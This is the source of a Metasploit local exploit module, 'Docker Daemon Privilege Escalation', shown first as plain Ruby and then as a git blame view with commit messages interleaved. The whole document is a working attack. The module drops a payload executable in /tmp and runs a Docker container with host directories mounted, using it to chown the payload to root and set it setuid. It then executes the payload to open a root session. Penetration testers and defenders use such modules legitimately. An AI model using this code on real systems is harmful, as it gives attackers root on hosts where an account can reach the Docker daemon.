metasploit-framework/modules/exploits/linux/local/docker_daemon_privilege_esc...

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
  include Msf::Exploit::EXE
  include Msf::Post::File

  def initialize(info={})
    super(update_info(info, {
      'Name'          => 'Docker Daemon Privilege Escalation',
      'Description'   => %q{
        This module obtains root privileges from any host account with access to the
        Docker daemon. Usually this includes accounts in the `docker` group.
      },
      'License'       => MSF_LICENSE,
      'Author'        => ['forzoni'],
      'DisclosureDate' => 'Jun 28 2016',
      'Platform'      => 'linux',
      'Arch'          => [ARCH_X86, ARCH_X86_64],
      'Targets'       => [ ['Automatic', {}] ],
      'SessionTypes'  => ['shell', 'meterpreter']
      }
    ))
    register_options([
      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
    ], self.class)
  end

  def check
    if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/
      print_error("Failed to access Docker daemon.")
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Vulnerable
    end
  end

  def exploit
    pl = generate_payload_exe
    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
    print_status("Writing payload executable to '#{exe_file}'")
    write_file(exe_file, pl)
    cmd_exec("chmod +x #{exe_file}")
    vprint_status shell_script(exe_file)
    vprint_status cmd_exec("sh -c '#{shell_script(exe_file)}'")

    stime = Time.now.to_f
    print_status "Starting the payload handler..."
    until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
      Rex.sleep(1)
    end
  end

  def shell_script(exploit_path)
    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
    dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
    %Q{
      IMG=`echo "FROM scratch\\nCMD a" | docker build -q - | cut -d ":" -f2`
      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
      docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
      docker rmi $IMG
      #{exploit_path}
    }.strip.split("\n").map(&:strip).join(';')
  end

end
Add privilege escalation for host users that can access the docker daemon. 2016-06-28 08:24:41 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/exploit/exe'`

			`class MetasploitModule < Msf::Exploit::Local`
			`Rank = ExcellentRanking`
			`include Msf::Exploit::EXE`
			`include Msf::Post::File`

			`def initialize(info={})`
			`super(update_info(info, {`
			`'Name' => 'Docker Daemon Privilege Escalation',`
			`'Description' => %q{`
			`This module obtains root privileges from any host account with access to the`
			Docker daemon. Usually this includes accounts in the `docker` group.
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => ['forzoni'],`
			`'DisclosureDate' => 'Jun 28 2016',`
			`'Platform' => 'linux',`
			`'Arch' => [ARCH_X86, ARCH_X86_64],`
			`'Targets' => [ ['Automatic', {}] ],`
			`'SessionTypes' => ['shell', 'meterpreter']`
			`}`
			`))`
			`register_options([`
			`OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),`
			`OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])`
			`], self.class)`
			`end`

			`def check`
			`if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/`
s/print_warning/print_error. 2016-06-28 15:26:23 +00:00			`print_error("Failed to access Docker daemon.")`
Add privilege escalation for host users that can access the docker daemon. 2016-06-28 08:24:41 +00:00			`Exploit::CheckCode::Safe`
			`else`
			`Exploit::CheckCode::Vulnerable`
			`end`
			`end`

			`def exploit`
			`pl = generate_payload_exe`
			`exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"`
			`print_status("Writing payload executable to '#{exe_file}'")`
			`write_file(exe_file, pl)`
			`cmd_exec("chmod +x #{exe_file}")`
Move some log lines to vprint_status. 2016-06-28 08:28:41 +00:00			`vprint_status shell_script(exe_file)`
			`vprint_status cmd_exec("sh -c '#{shell_script(exe_file)}'")`
Add privilege escalation for host users that can access the docker daemon. 2016-06-28 08:24:41 +00:00
			`stime = Time.now.to_f`
			`print_status "Starting the payload handler..."`
			`until session_created? \|\| stime + datastore['ListenerTimeout'] < Time.now.to_f`
			`Rex.sleep(1)`
			`end`
			`end`

			`def shell_script(exploit_path)`
			`deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]`
			`dep_options = deps.uniq.map { \|dep\| "-v #{dep}:#{dep}" }.join(" ")`
			`%Q{`
			IMG=`echo "FROM scratch\\nCMD a" \| docker build -q - \| cut -d ":" -f2`
			`EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"`
Remove bash dependency. Oops. 2016-06-29 03:39:45 +00:00			`docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"`
Add privilege escalation for host users that can access the docker daemon. 2016-06-28 08:24:41 +00:00			`docker rmi $IMG`
			`#{exploit_path}`
			`}.strip.split("\n").map(&:strip).join(';')`
			`end`

			`end`